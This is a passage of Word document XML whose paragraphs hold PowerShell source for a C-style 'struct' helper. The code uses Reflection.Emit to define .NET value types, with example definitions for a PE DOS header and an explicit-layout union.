    <w:p w14:paraId="19FEF996" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            OS2_SIGNATURE_LE = 0x454C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9B972" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            VXD_SIGNATURE =    0x454C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210C2EF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B72B0CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29F52747" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF085DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_magic =    field 0 $ImageDosSignature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C5C87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_cblp =     field 1 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686A0CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_cp =       field 2 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D3B8C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_crlc =     field 3 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4663ADB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_cparhdr =  field 4 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B1027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_minalloc = field 5 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877927E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_maxalloc = field 6 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3BBC05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_ss =       field 7 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A8FA43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_sp =       field 8 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5195AC23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_csum =     field 9 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F9A5B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_ip =       field 10 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05571FA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_cs =       field 11 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65BF66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_lfarlc =   field 12 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CB0AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_ovno =     field 13 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C2CA2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2ADFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_oemid =    field 15 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6978A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_oeminfo =  field 16 UInt16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545C1C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60270053" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            e_lfanew =   field 18 Int32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344499E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC90797" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="243519DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Example of using an explicit layout in order to create a union.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D8C8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TestUnion = struct $Mod TestUnion @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275B439" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            field1 = field 0 UInt32 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788FAE9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            field2 = field 1 IntPtr 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2AE148" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        } -ExplicitLayout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771157B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F5E7858" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .NOTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163BADCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A873F42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PowerShell purists may disagree with the naming of this function but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019279C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        again, this was developed in such a way so as to emulate a "C style"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B56A6F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        definition as closely as possible. Sorry, I'm not going to name it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76509CEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        New-Struct. :P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA17995" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C20D3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D82BB45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [OutputType([Type])]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57254C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593ECFA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B0AA4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 1, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69826978" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B151974" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Module,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E5076" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FE15FC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 2, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24238BB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3B716" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43838508" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27936D09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DCAB6AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position = 3, Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF04D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F92E21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Hashtable]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B7E27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StructFields,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D39A07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14C8BBC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Reflection.Emit.PackingSize]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D7EAAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PackingSize = [Reflection.Emit.PackingSize]::Unspecified,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D52C996" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C0C5822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709DE59E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExplicitLayout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747ED35C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407F5F17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="716FDA22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Module -is [Reflection.Assembly])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B102FF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670C892B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        return ($Module.GetType($FullName))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F71541" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF74843" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C9C1086" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A32CAE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Class,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E10A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Public,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF19442" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Sealed,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D18DA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        BeforeFieldInit'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F342C29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F8F21B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($ExplicitLayout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C8CCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09822D81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621854C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A782E01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89B78D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153783B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3871BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52700E57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FE2FFAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276F15A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1815E64F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B312BA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4864A665" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Fields = New-Object Hashtable[]($StructFields.Count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58504CC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B9E5133" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Sort each field according to the orders specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DE261" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Unfortunately, PSv2 doesn't have the luxury of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B025656" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # hashtable [Ordered] accelerator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B71CCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    ForEach ($Field in $StructFields.Keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D8AC2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D523409" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Index = $StructFields[$Field]['Position']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A2F026" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E3A217" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE46B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="257BA5C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    ForEach ($Field in $Fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393D88E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E76C78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FieldName = $Field['FieldName']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3909DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FieldProp = $Field['Properties']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C4E0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D8B6911" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Offset = $FieldProp['Offset']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184AA64B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Type = $FieldProp['Type']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA3B21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $MarshalAs = $FieldProp['MarshalAs']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091B1717" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F518660" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259D0A7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14A7AD62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($MarshalAs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB351E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D59174E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDFDAD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($MarshalAs[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB12DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FA14B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Size = $MarshalAs[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8BA17F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF6A83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $UnmanagedType, $SizeConst, @($Size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C661AA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74194431" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A0F9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02154DE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A7149" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8B33F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06C14B6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $NewField.SetCustomAttribute($AttribBuilder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40774D18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD569E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="054CE178" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
